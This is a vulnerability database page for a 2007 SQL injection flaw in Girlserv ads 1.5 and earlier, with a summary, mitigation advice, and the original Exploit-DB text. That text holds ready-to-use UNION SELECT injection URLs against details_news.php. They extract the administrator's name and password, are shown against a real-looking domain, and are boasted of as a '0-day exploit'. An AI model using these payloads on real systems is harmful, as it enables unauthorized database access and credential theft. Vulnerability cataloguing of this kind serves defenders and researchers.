header-logo
Suggest Exploit
vendor:
Girlserv ads
by:
Cold z3ro
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Girlserv ads
Affected Version From: 1
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE: a:girlserv:ads:1.5
Metasploit:
Other Scripts:
Platforms Tested:
2007

Girlserv ads <= 1.5 Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks by exploiting the /details_news.php page. By manipulating the 'idnew' parameter, an attacker can inject malicious SQL queries and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security fixes is essential.
Source

Exploit-DB raw data:

Girlserv ads <= 1.5 Remote SQL Injection Vulnerability

Found By : Cold z3ro , Cold-z3ro@hotmail.com

Homepages : http://hackteach.org , http://h4ps.com

Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip

For Admin :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
For password :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*

Example ;
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*

=================================================
0-day Exploit :)
=================================================
Greets : Hackteach members , Pal-hacker.com admins ,  xp10.com members , and
All friend
=============================================
Cold !F iT z3ro , No One Equal One
=============================================

#Long life Palestine
#http://hackteach.org

# milw0rm.com [2007-07-03]

Navigation

Suggest Exploit

Services By CQR